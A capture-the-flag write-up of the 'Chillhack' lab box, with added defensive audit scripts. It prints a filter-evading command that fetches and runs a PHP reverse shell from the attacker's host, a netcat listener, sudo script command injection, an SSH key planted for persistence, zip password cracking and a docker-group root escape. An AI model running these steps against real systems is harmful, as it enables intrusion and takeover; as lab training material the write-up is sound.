Chillhack

Overview

Overview: This machine started out great, but I did not enjoy it much since it did not fit my need at the moment to train for a certification. This is a great machine with a wide variety of exposure and you will definitely enjoy it.

Anyway, I am not spending too much energy on this write-up, but here is a quick run-through for you:

A directory scan reveals a “secret” directory, which leads to a page that executes shell commands for you. Host a PHP reverse shell on your attack machine and fetch and run it from that page.

On the attack machine, serve the PHP reverse shell over HTTP:

eneloop@kinetic:/oscp/tools/reverse-shell$ ls
php-reverse-shell.php  shell.php
eneloop@kinetic:/oscp/tools/reverse-shell$ python3 -m http.server
Serving HTTP on 0.0.0.0 port 8000 (http://0.0.0.0:8000/) ...
10.10.121.174 - - [05/Dec/2020 09:12:03] "GET /shell.php HTTP/1.1" 200 -

This is the command submitted through the page. The shell removes the backslash before it runs the command, so p\hp still executes php, while the literal word "php" never appears in the string the page receives:

curl http://10.6.19.215:8000/shell.php | p\hp

The listener catches the callback as www-data:

# nc -lvnp 4444
listening on [any] 4444 ...
connect to [10.6.19.215] from (UNKNOWN) [10.10.52.230] 53744
Linux ubuntu 4.15.0-118-generic #119-Ubuntu SMP Tue Sep 8 12:30:01 UTC 2020 x86_64 x86_64 x86_64 GNU/Linux
 03:39:11 up 49 min,  0 users,  load average: 0.00, 0.00, 0.00
USER     TTY      FROM             LOGIN@   IDLE   JCPU   PCPU WHAT
uid=33(www-data) gid=33(www-data) groups=33(www-data)
/bin/sh: 0: can't access tty; job control turned off
$ 
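The p\hp trick works against any filter that substring-matches the raw command. The page's actual filter is not shown in this write-up, so the following is an added example (not code from the box or the author) with an assumed word list; it shows several spellings that a naive blacklist lets through but that the shell resolves to php, and the allowlist that is the correct fix:

```shell
#!/bin/sh
# Added example, not the box's filter: the blocked words are an assumption.
BLOCKED_WORDS="php python nc bash wget"

# What a naive web filter does: substring-match the raw command string.
# Returns 0 (blocked) if a blocked word appears literally, 1 otherwise.
naive_blacklist_blocks() {
    cmd=$1
    for w in $BLOCKED_WORDS; do
        case "$cmd" in *"$w"*) return 0 ;; esac
    done
    return 1
}

# What the shell actually executes: the command word after quote removal and
# command substitution. Printing it through sh -c applies the same expansion
# that `sh -c "$cmd"` on the server would apply.
shell_resolves_to() {
    sh -c "printf '%s' $1"
}

# The fix: allowlist whole commands, never blacklist substrings.
ALLOWED_COMMANDS="id whoami uptime"
allowlist_permits() {
    for a in $ALLOWED_COMMANDS; do
        [ "$1" = "$a" ] && return 0
    done
    return 1
}

# Usage: each variant is `php` to the shell but invisible to the blacklist.
for variant in 'p\hp' "p''hp" '"p"hp' '$(echo p)hp'; do
    if naive_blacklist_blocks "$variant"; then verdict=blocked; else verdict=allowed; fi
    printf '%-14s blacklist: %-8s shell runs: %s\n' \
        "$variant" "$verdict" "$(shell_resolves_to "$variant")"
done
```

Backslash removal, empty quotes and command substitution all happen before the command name is looked up, so no list of forbidden words can be complete; the only robust check is an exact match against commands you intend to allow.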

Once you have the shell, sudo -l shows a script that www-data is allowed to run as the user apaar (/home/apaar/.helpline.sh), and apaar's home directory holds a mysterious local.txt.

$ sudo -u apaar /home/apaar/.helpline.sh

Welcome to helpdesk. Feel free to talk to anyone at any time!

asasa
Thank you for your precious time!
$ bash
whoami
www-data

The script's prompts do not appear in the plain reverse shell: bash's read -p only prints its prompt when input comes from a terminal. Upgrade to a pty first (python3 is present, python is not):

python -c 'import pty; pty.spawn("/bin/bash");'
bash: line 5: python: command not found
which python
python3 -c 'import pty; pty.spawn("/bin/bash");'

www-data@ubuntu:/home/apaar$ sudo -u apaar /home/apaar/.helpline.sh

Welcome to helpdesk. Feel free to talk to anyone at any time!

Enter the person whom you want to talk with: santa
Hello user! I am santa,  Please enter your message: bash -i
whoami
apaar
ls -l
total 4
-rw-rw---- 1 apaar apaar 46 Oct  4 07:25 local.txt
cat local.txt
{USER-FLAG: XXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXX}

Whatever you type as the message is executed by the script as a command, so entering bash -i starts an interactive bash with the script's privileges, i.e. as apaar.

So, the local.txt ended up being the first user flag.
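The body of .helpline.sh is not shown above, so the following is an added reconstruction (an assumption, not the box's file) of the one-line mistake that reproduces the behaviour in the transcript, next to the hardened form and a grep you can run over any script sudo -l lets you execute:

```shell
#!/bin/sh
# Added example: a minimal reconstruction of the vulnerable pattern, not the
# real /home/apaar/.helpline.sh, whose contents the write-up does not show.

# Vulnerable: the message is expanded unquoted in command position, so the
# shell runs it. Under `sudo -u apaar` it runs as apaar, which is exactly how
# "bash -i" became an apaar shell.
helpline_vuln() {
    msg=$1
    $msg 2>/dev/null
}

# Hardened: the message is data. Quote it and pass it only to commands that
# treat their argument as text (printf, logger, an append to a file).
helpline_safe() {
    msg=$1
    printf 'Message recorded: %s\n' "$msg"
}

# Audit helper: a line that starts with a bare $var or ${var} is a variable
# used as a command. Prints "line:text" for each hit.
find_var_as_command() {
    grep -nE '^[[:space:]]*\$\{?[A-Za-z_][A-Za-z0-9_]*\}?([[:space:]]|$)' "$1"
}

# Usage: the same input is a command to one function and text to the other.
helpline_vuln 'id'
helpline_safe 'id'
```

Run find_var_as_command against every script that sudo -l lists; a hit means the script's input, or any variable an attacker can influence, is a command line.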

For a stable foothold, append your own public key to apaar's authorized_keys (the key blobs are redacted here):

cd .ssh
ls
authorized_keys
echo "ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQDfiK99/NWavu+zHyLtp5qatCXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXXf1LeMvJNke7I53+VR8qOYzkKlzJl1Q3Y1/72B5CBJFULnB6vSiCpxEywML1Nj2/0g84F/XR75pJkmD2BkWnxQabsVp2ja4CzhpLtZCWXEGimz3Kxg1Z6mM9a3Bf1lrASPS9q55Oahoym3eIAAbQHip8fjnkrwhH8sQpNqsBuiKVYwezMVcVUPw5ipwM= XXX@XXXX" >> authorized_keys
cat authorized_keys
ssh-rsa ... root@ubuntu
ssh-rsa ... eneloop@kinetic

Note that the file already carried a root@ubuntu key before the append; on a real engagement, a second key in an account's authorized_keys is exactly the kind of change a defender should be diffing for.
The matching private key then logs in directly (the target here is apaar@10.10.165.65, a fresh instance of the box, hence the different address):

eneloop@kinetic:~/.ssh$ cat id_rsa.pub 
ssh-rsa ... eneloop@kinetic
eneloop@kinetic:~/.ssh$ ssh apaar@10.10.165.65
The authenticity of host '10.10.165.65 (10.10.165.65)' can't be established.
ECDSA key fingerprint is SHA256:ybdflPQMn6OfMBIxgwN4h00kin8TEPN7r8NYtmsx3c8.
Are you sure you want to continue connecting (yes/no/[fingerprint])? yes
Warning: Permanently added '10.10.165.65' (ECDSA) to the list of known hosts.
Welcome to Ubuntu 18.04.5 LTS (GNU/Linux 4.15.0-118-generic x86_64)

 * Documentation:  https://help.ubuntu.com
 * Management:     https://landscape.canonical.com
 * Support:        https://ubuntu.com/advantage

  System information as of Sat Dec  5 01:15:27 UTC 2020

  System load:  0.08               Processes:              119
  Usage of /:   24.8% of 18.57GB   Users logged in:        0
  Memory usage: 20%                IP address for eth0:    10.10.165.65
  Swap usage:   0%                 IP address for docker0: 172.17.0.1

  => There is 1 zombie process.

 * Canonical Livepatch is available for installation.
   - Reduce system reboots and improve kernel security. Activate at:
     https://ubuntu.com/livepatch

19 packages can be updated.
0 updates are security updates.

Last login: Sun Oct  4 14:05:57 2020 from 192.168.184.129
apaar@ubuntu:~$ 

Two details in the banner are worth noting for later: docker0 is up, so a Docker daemon is running, and the box was last logged into from a 192.168.184.x address.
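The defender's side of the authorized_keys step, as an added example that is not part of the write-up: compare an account's authorized_keys against the keys the owner actually issued and report anything else. Both files are constructed samples with placeholder blobs, not real keys; the point is that the comment field (root@ubuntu, eneloop@kinetic) is attacker-controlled and must not be what you match on.

```shell
#!/bin/sh
# Added example: audit authorized_keys against a list of known keys.
# Both files are constructed samples; the blobs are placeholders, not keys.
AUTHORIZED=$(mktemp); KNOWN=$(mktemp)
cat > "$KNOWN" <<'EOF'
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC0owner0 root@ubuntu
EOF
cat > "$AUTHORIZED" <<'EOF'
# keys for apaar
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC0owner0 root@ubuntu
ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQCattacker eneloop@kinetic
ssh-ed25519 AAAAC3NzaC1lZDI1NTE5AAAAIattacker2 root@ubuntu
EOF

# Print "<type> <blob>" for each key line: skip blank and comment lines, drop
# any leading options and the trailing comment. The third sample key carries a
# plausible-looking comment, so matching on comments would miss it.
key_material() {
    grep -vE '^[[:space:]]*(#|$)' "$1" \
      | awk '{ for (i = 1; i <= NF; i++)
                 if ($i ~ /^(ssh-|ecdsa-|sk-)/) { print $i, $(i+1); break } }'
}

# Keys present in authorized_keys ($1) whose material is not in the known list ($2).
unknown_keys() {
    key_material "$2" > "$2.known"
    key_material "$1" | grep -vxF -f "$2.known"
    rm -f "$2.known"
}

# Usage: prints the two keys that were never issued.
unknown_keys "$AUTHORIZED" "$KNOWN"
```

Run it from a file-integrity job or a cron that mails the output; any line is a key that nobody on the defending side created.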
The box has a service bound to localhost:9001 that is not reachable from outside. Forward it through the SSH session so it can be browsed from the attack machine on port 3000 (the -f and -N flags background the connection and run no remote command):

ssh -fNL 0.0.0.0:3000:localhost:9001 apaar@10.10.165.65

The files pulled from that internal site ended up in the working directory below, along with the earlier notes. Among them is backup.zip, which is password protected.
root@kinetic:/oscp/LABs/zerotrust/content/lab/tryhackme/chillhack/data# ls -otr
total 2296
-rwxrwx--- 1 root    7273 Dec  3 21:51 chillhack-thumb.png
-rwxrwx--- 1 root   20837 Dec  3 21:51 box_header.png
-rwxrwx--- 1 root    2450 Dec  3 21:53 chillhack.nmap.txt
-rwxrwx--- 1 root      90 Dec  3 21:55 note.txt
-rwxrwx--- 1 root   25329 Dec  3 22:01 secret.png
-rwxrwx--- 1 root   30639 Dec  3 22:05 areyouhacker.png
-rwxrwx--- 1 root   14711 Dec  3 22:06 try-commands.png
-rwxrwx--- 1 root   69309 Dec  4 19:25 hacker-source.png
-rwxrwx--- 1 root 2083694 Dec  5 09:21 002d7e638fb463fb7a266f5ffc7ac47d.gif
-rwxrwx--- 1 root   68841 Dec  5 09:25 hacker-with-laptop_23-2147985341.jpg
-rwxrwx--- 1 root     750 Dec  5 09:25 backup.zip
-rwxrwx--- 1 root    1239 Dec  5 09:30 myfile.php
root@kinetic:/oscp/LABs/zerotrust/content/lab/tryhackme/chillhack/data# john --format=zip ./myfile.php 

Pointing john at a file that is not a hash file does nothing, hence the empty output above. john needs the hash that zip2john extracts from the archive; file.txt below holds that output (the "backup.zip/source_code.php" label in the cracked line is zip2john's format):

root@kinetic:/oscp/LABs/zerotrust/content/lab/tryhackme/chillhack/data# john file.txt --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (PKZIP [32/64])
Will run 2 OpenMP threads
Press 'q' or Ctrl-C to abort, almost any other key for status
pass1word        (backup.zip/source_code.php)
1g 0:00:00:00 DONE (2020-12-05 09:35) 50.00g/s 614400p/s 614400c/s 614400C/s total90..hawkeye
Use the "--show" option to display all of the cracked passwords reliably
Session completed
root@kinetic:/oscp/LABs/zerotrust/content/lab/tryhackme/chillhack/data# unzip backup.zip 
Archive:  backup.zip
[backup.zip] source_code.php password: 
  inflating: source_code.php  

The archive contains source_code.php, the login handler of that internal site. The relevant part (the rest of the file is not shown here):
<?php
if(isset($_POST['submit']))
{
	$email = $_POST["email"];
	$password = $_POST["password"];
	// Hard-coded credential. base64 is an encoding, not a hash: anyone who
	// reads this file recovers the password with `base64 -d`.
	if(base64_encode($password) == "IWQwbnRLbjB3bVlwQHNzdzByZA==")
	{
		// rand() is not a cryptographic generator, and the OTP is mailed to
		// whatever address the submitter supplied in the same form, so the
		// second factor adds nothing.
		$random = rand(1000,9999);?><br><br><br>
		<form method="POST">
			Enter the OTP: <input type="number" name="otp">
			<input type="submit" name="submitOtp" value="Submit">
		</form>
	<?php	mail($email,"OTP for authentication",$random);
	}
}
?>
# echo "IWQwbnRLbjB3bVlwQHXXXXXXXXX==" | base64 -d
XXXXXXXXXXX
The decoded string is reused as the password of the local user anurodh, so switching users from the apaar session works:

Last login: Sun Oct  4 14:05:57 2020 from 192.168.184.129
apaar@ubuntu:~$ su anurodh
Password: 
anurodh@ubuntu:/home/apaar$ ls -l
anurodh is a member of the docker group. The Docker daemon runs as root and will mount any host path into a container on request, so membership of that group is effectively root: mount / into an alpine container, chroot into it, and you are root on the host.

anurodh@ubuntu:~$ id
uid=1002(anurodh) gid=1002(anurodh) groups=1002(anurodh),999(docker)
anurodh@ubuntu:~$ 
anurodh@ubuntu:~$ docker ps
CONTAINER ID        IMAGE               COMMAND             CREATED             STATUS              PORTS               NAMES
anurodh@ubuntu:~$ ps -ef | grep docker
root      1261     1  0 14:10 ?        00:00:00 /usr/bin/dockerd -H fd:// --containerd=/run/containerd/containerd.sock
anurodh   2210  2097  0 14:42 pts/1    00:00:00 grep --color=auto docker
anurodh@ubuntu:~$ which docker
/usr/bin/docker
anurodh@ubuntu:~$ ls -l /usr/bin/docker
-rwxr-xr-x 1 root root 84982272 Sep 16 17:01 /usr/bin/docker
anurodh@ubuntu:~$ docker run -v /:/mnt --rm -it alpine chroot /mnt sh
# whoami
root
# ls
bin  boot  cdrom  dev  etc  home  initrd.img  initrd.img.old  lib  lib64  lost+found  media  mnt  opt  proc  run	sbin  snap  srv  swap.img  sys	tmp  usr  var  vmlinuz	vmlinuz.old
# cd /root
# ls
proof.txt

No container was running beforehand (docker ps is empty); the escape only needs the daemon's socket, which the docker group grants. Note that the alpine image has to be available locally or pullable from the box.

The proof.txt has the root flag.
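The condition that gave root here is a group membership, which is cheap to audit. The following is an added example (not from the write-up) that lists every member of a root-equivalent group in an /etc/group file and offers the check an attacker runs on a foothold. The /etc/group content is a constructed sample, not the box's file, and the group list is an assumption you should extend for your own hosts.

```shell
#!/bin/sh
# Added example: find users whose group membership is effectively root.
# The /etc/group content below is a constructed sample.
SAMPLE_GROUP=$(mktemp)
cat > "$SAMPLE_GROUP" <<'EOF'
root:x:0:
sudo:x:27:alice
docker:x:999:anurodh
apaar:x:1001:
lxd:x:108:anurodh
anurodh:x:1002:
EOF

# Groups whose members can reach root without sudo: docker (daemon runs as
# root and bind-mounts host paths), lxd (same idea with LXD containers),
# disk (raw access to block devices). Assumed list; extend as needed.
ROOT_EQUIV_GROUPS="docker lxd disk"

# Print "<user> <group>" for every member of a root-equivalent group.
root_equivalent_members() {
    awk -F: -v groups="$ROOT_EQUIV_GROUPS" '
        BEGIN { n = split(groups, g, " "); for (i = 1; i <= n; i++) want[g[i]] = 1 }
        ($1 in want) && $4 != "" {
            m = split($4, members, ",")
            for (i = 1; i <= m; i++) print members[i], $1
        }' "$1"
}

# Foothold check: given the output of `id -nG` (space-separated group names),
# print the first root-equivalent group found and return 0, else return 1.
in_root_equivalent_group() {
    for g in $1; do
        for r in $ROOT_EQUIV_GROUPS; do
            [ "$g" = "$r" ] && { echo "$g"; return 0; }
        done
    done
    return 1
}

# Usage: audit the sample file; on a live host run
#   root_equivalent_members /etc/group
#   in_root_equivalent_group "$(id -nG)"
root_equivalent_members "$SAMPLE_GROUP"
```

Treat every name this prints as a root account for the purposes of access review; if the user only needs to run containers, a rootless Docker setup or a sudo rule scoped to specific commands is the alternative.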